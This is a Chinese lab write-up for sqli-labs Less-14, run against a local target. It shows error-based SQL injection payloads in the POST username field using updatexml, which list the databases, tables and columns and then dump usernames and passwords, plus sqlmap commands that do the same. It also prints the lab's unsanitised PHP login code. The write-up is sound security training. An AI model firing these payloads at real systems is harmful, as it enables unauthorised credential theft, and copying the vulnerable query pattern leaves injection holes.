当前位置：首页 > article >正文

sql-labs靶场第十四关测试报告

article 2024/10/21 18:09:43

一、测试环境

1、系统环境

2、使用工具/软件

二、测试目的

三、操作过程

1、寻找注入点

2、注入数据库

①寻找注入方法

②爆库，查看数据库名称

③爆表，查看security库的所有表

④爆列，查看users表的所有列

⑤成功获取用户名和密码信息

3、sqlmap注入方法

①爆库

②爆表

③爆列

④爆字段

四、源代码分析

五、结论

一、测试环境

1、系统环境

渗透机：本机(127.0.0.1)

靶机：本机(127.0.0.1)

2、使用工具/软件

火狐浏览器的hackbar插件，版本：2.3.1；

Burp suite，版本：2024.7.2；

测试网址：http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-14/

二、测试目的

测试post型的sql注入，使用报错注入注入出账户密码；使用sqlmap爆破，熟悉sqlmap的参数。

三、操作过程

1、寻找注入点

尝试提交数据，发现url中没有参数，猜测是post型传参

抓个包看看，是post类型传参，两个注入点：username和password

2、注入数据库

①寻找注入方法

知道传递数据方式后，直接使用hackbar传递post型参数即可，格式抓包可以知道

uname=12&passwd=12&submit=Submit

执行，可以传递数据

加个引号，没有任何信息

uname=12'&passwd=12&submit=Submit

加上双引号，有了报错信息

测试闭合方式

测试判断列数的sql语句是否执行成功

经过不断尝试得到闭合符号为"时，语句正常执行

uname=12" order by 2#&passwd=12&submit=Submit

uname=12" order by 3#&passwd=12&submit=Submit

测试2列时没报错，测试3列时报了错

语句执行成功，并且该数据表共2列

闭合符号是双引号 "

使用联合查询注入不成功

uname=12" union select 1,2#&passwd=12&submit=Submit

这关还有报错信息，尝试报错注入成功

uname=12" and updatexml(1,concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata),1,31),0x7e),1)#&passwd=12&submit=Submit

②爆库，查看数据库名称

爆出所有数据库

uname=12" and updatexml(1,concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata),1,31),0x7e),1)#&passwd=12&submit=Submit

uname=12" and updatexml(1,concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata),32,31),0x7e),1)#&passwd=12&submit=Submit

uname=12" and updatexml(1,concat(0x7e,substr((select group_concat(schema_name) from information_schema.schemata),63,31),0x7e),1)#&passwd=12&submit=Submit

③爆表，查看security库的所有表

uname=12" and updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,31),0x7e),1)#&passwd=12&submit=Submit

④爆列，查看users表的所有列

uname=12" and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),1,31),0x7e),1)#&passwd=12&submit=Submit

⑤成功获取用户名和密码信息

爆字段值，查看username和password字段的所有信息

uname=12" and updatexml(1,concat(0x7e,substr((select group_concat(username,'^',password) from users),1,31),0x7e),1)#&passwd=12&submit=Submit

uname=12" and updatexml(1,concat(0x7e,substr((select group_concat(username,'^',password) from users),32,31),0x7e),1)#&passwd=12&submit=Submit

uname=12" and updatexml(1,concat(0x7e,substr((select group_concat(username,'^',password) from users),63,31),0x7e),1)#&passwd=12&submit=Submit

uname=12" and updatexml(1,concat(0x7e,substr((select group_concat(username,'^',password) from users),94,31),0x7e),1)#&passwd=12&submit=Submit

uname=12" and updatexml(1,concat(0x7e,substr((select group_concat(username,'^',password) from users),125,31),0x7e),1)#&passwd=12&submit=Submit

uname=12" and updatexml(1,concat(0x7e,substr((select group_concat(username,'^',password) from users),156,31),0x7e),1)#&passwd=12&submit=Submit

uname=12" and updatexml(1,concat(0x7e,substr((select group_concat(username,'^',password) from users),187,31),0x7e),1)#&passwd=12&submit=Submit

3、sqlmap注入方法

①爆库

这关是post传参，sqlmap爆破需要抓包将数据包保存，再进行爆破

Sqlmap稳定发挥，yyds

Burp右键选择copy to file保存

python sqlmap.py -r C:\Users\lenovo\Desktop\1.txt --dbs

使用python程序

-r 指定抓到的数据包文件

--dbs 是爆库的参数

②爆表

python sqlmap.py -r C:\Users\lenovo\Desktop\1.txt -D security --tables

-D 指定数据库，在这个数据库里找数据表

--tables 爆表的参数

③爆列

python sqlmap.py -r C:\Users\lenovo\Desktop\1.txt -D security -T users --columns

-D 指定数据库

-T 指定数据表

--columns 爆破列名的参数

④爆字段

python sqlmap.py -r C:\Users\lenovo\Desktop\1.txt -D security -T users -C username,password --dump

-D 指定数据库

-T 指定数据表

-C 指定需要爆破的列名

--dump 爆破字段值的参数

四、源代码分析

<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);

// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
    $uname=$_POST['uname'];
    $passwd=$_POST['passwd'];

    //logging the connection parameters to a file for analysis.
    $fp=fopen('result.txt','a');
    fwrite($fp,'User Name:'.$uname."\n");
    fwrite($fp,'Password:'.$passwd."\n");
    fclose($fp);

    // connectivity
    $uname='"'.$uname.'"';
    $passwd='"'.$passwd.'"'; 
    @$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);

    if($row)
    {
        //echo '<font color= "#0000ff">';   
        
        echo "<br>";
        echo '<font color= "#FFFF00" font size = 4>';
        //echo " You Have successfully logged in " ;
        echo '<font size="3" color="#0000ff">'; 
        echo "<br>";
        //echo 'Your Login name:'. $row['username'];
        //echo "<br>";
        //echo 'Your Password:' .$row['password'];
        //echo "<br>";
        echo "</font>";
        echo "<br>";
        echo "<br>";
        echo '<img src="../images/flag.jpg" />';    
        
        echo "</font>";
    }
    else  
    {
        echo '<font color= "#0000ff" font size="3">';
        //echo "Try again looser";
        print_r(mysql_error());
        echo "</br>";
        echo "</br>";
        echo "</br>";
        echo '<img src="../images/slap.jpg"  />';   
        echo "</font>";  
    }
}

?>

1.error_reporting(0);函数，关闭了php代码的所有错误报告。

2.检测了用户名和密码是否设置，是则传入post参数，给post参数添加了双引号，然后sql语句直接进行了调用，没有过滤。

3.这关将执行成功则打印到页面的语句注释了，结果不会有显示。执行失败会将mysql报错信息打印出来。

4.Sql语句只取一行，注入时会把注释掉。